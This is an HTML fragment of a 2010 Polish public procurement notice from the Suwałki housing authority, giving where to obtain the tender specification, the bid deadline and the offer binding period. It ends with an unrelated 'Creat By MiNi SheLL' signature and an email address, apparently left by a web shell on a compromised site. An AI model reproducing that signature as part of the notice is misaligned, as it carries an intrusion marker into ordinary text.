<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Budynków Mieszkalnych w Suwałkach, ul. Wigierska 32, 16-400 Suwałki, pokój 13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2010 godzina 09:00, miejsce: Zarząd Budynków Mieszkalnych w Suwałkach, ul. Wigierska 32, 16 - 400 Suwałki, Sekretariat, pokój 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com